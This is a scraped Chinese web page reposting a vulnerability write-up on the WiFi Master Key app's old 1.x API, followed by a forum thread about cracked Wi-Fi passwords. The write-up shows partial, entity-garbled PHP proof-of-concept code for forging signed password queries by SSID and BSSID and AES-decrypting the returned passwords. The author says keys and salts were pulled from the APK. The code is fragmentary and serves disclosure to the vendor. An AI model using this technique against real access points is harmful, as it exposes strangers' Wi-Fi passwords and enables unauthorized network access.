手机万能钥匙密码查看破裂密码后,怎么才能知道密码是多少

来源:蜘蛛抓取(WebSpider) 时间:2017-03-09 21:47 标签: 能显示密码的万能钥匙
大家都在下
  从今年的双十一的销售成绩看,华为、魅族、小米形成了三国鼎立的局...
  在之前的微信教程中,我们分享了删除微信红包发送与领取记录的方法...
还没关注下载之家微信 的亲们赶紧扫一扫左侧的二维码吧!
亲们赶紧扫一扫关注下载之家的微信与我们互动吧!
微信公众号新浪微博
拼音索引:WIFI万能钥匙密码查询接口算法破解(可无限查询用户AP明文密码)
凡是APP就涉及到通信接口,看了下万能钥匙的APP,走的明文HTTP协议这就简单了。
分析Android程序有个杀手锏,就是程序在更新迭代的时候新版本做了API改动,但为了兼容考虑,老版本存在问题的API不会下线,一直存在线上。。。
从GooglePlay下载了1.X版本的WIFI万能钥匙,确实还能用,通过程序包分析算法(说一下在,各种key,salt明文存储,连混淆哪怕是字符拼接都没有。。。)
这个是查询密码用到的数据包,以及参数中sign(签名)的算法,其实就是这些数据进行排序后用salt算个md5。新版本的万能钥匙还有个retSn,实现链式认证,也能突破,但这个报告只说1.x版本的API问题(1.x时代很多细节明显没有考虑完善,基本只靠sign做安全)。
第一部分完成了,但发现返回的密码竟然好长一串似乎还真没泄漏用户明文密码哎,但没明文客户端怎么连接呢。。。通过apk分析发现是用了AES加密,当然key和iv也泄漏了。
继续用JAVA程序实现
嘿嘿,原来你家密码是这个(跟这个朋友的分析一致 /)
另外测试的过程中突然提示
经过分析原来是dhid每日有查询限额,继续分析dhid算法,是通过服务器返回的,具体伪造不在说了,基本还是分析包,打包sign,发包了。
这样,就实现了通过SSID,和BSSID查询任意AP明文密码了,本地写了个自用的玩玩。为了证明真实并且避免被恶意利用,我只放出部分POC代码,厂商一看就懂。
function sign( $array , $do ){
// 签名算法
$request_str = '';
$salt = '';
$sign = '';
// 对应apk中的 Arrays.sort 数组排序,测试PHP需用 ksort
ksort( $array );
foreach ($array as $key =& $value) {
$request_str .= $
if ( $do == 'querypwd') {
$sign = md5( $request_str . SALT );
} elseif ( $do == 'querydhid' ) {
$sign = md5( $request_str . SALT2 );
查询密码的
function get_pwd(){
$ssid = addslashes( $_POST['ssid'] );
$mac = addslashes( $_POST['mac'] );
$data = '';
$array = array(
&och& =& &guanwang&,
&&ii&=& &345&,
&appid&=& &0006&,
&pid&=& &qryapwd:commonswitch&,
&mac&=&&xx:xx:xx:xx:xx:xx&,
&lang&=&&cn&,
&bssid&=&&$mac,&,
&v&=&&58&,
&ssid&=&&$ssid,&,
&method&=&&getSecurityCheckSwitch&,
&uhid&=& &a0000001&,
&st&=& &m&,
&chanid&=& &googleplay&,
&dhid& =& get_dhid()
$sign = sign( $array , 'querypwd' );
foreach ($array as $key =& $value) {
if ( $key == 'bssid') {
$data .= &sign=& . strtoupper($sign) . &&&;
$data .= &$key=& . urlencode( $value ) . &&&;
function decryptStrin($str,$keys=AESKey,$iv=AESIV,$cipher_alg=MCRYPT_RIJNDAEL_128){
&&& //Wi-Fi万能钥匙密码采用 AES/CBC/NoPadding 方式加密
&&& $decrypted_string = mcrypt_decrypt($cipher_alg, $keys, pack(&H*&,$str),MCRYPT_MODE_CBC, $iv);
&&& return $decrypted_
整个过程感觉自己又学到不少啊。。。PS:旧版本是默认分享用户WIFI的,1.0.8这个版本,厂商还记得吧?确实是用户同意的前提,不知情的同意?
【声明】:黑吧安全网()登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱,我们会在最短的时间内进行处理。
上一篇:【】【】破解了别人的无线,怎么知道别人的密码?_wifi万能钥匙吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名:今日本吧第个签到,本吧因你更精彩,明天继续来努力!
本吧签到人数:0成为超级会员,使用一键签到本月漏签0次!成为超级会员,赠送8张补签卡连续签到:天&&累计签到:天超级会员单次开通12个月以上,赠送连续签到卡3张
关注:65,625贴子:
破解了别人的无线,怎么知道别人的密码?收藏
图片来自:
原汁原味玩降魔,Q版西游尽显人物本色!
手机ROOT了的话 可以下载WIFI密码查看器
不过 既然能用了就别太贪心了
嗯,嘿嘿,多谢大神
下免费wifi钥匙能看到
登录百度帐号推荐应用
为兴趣而生,贴吧更懂你。或

我要回帖

更多关于 能显示密码的万能钥匙 的文章

 

随机推荐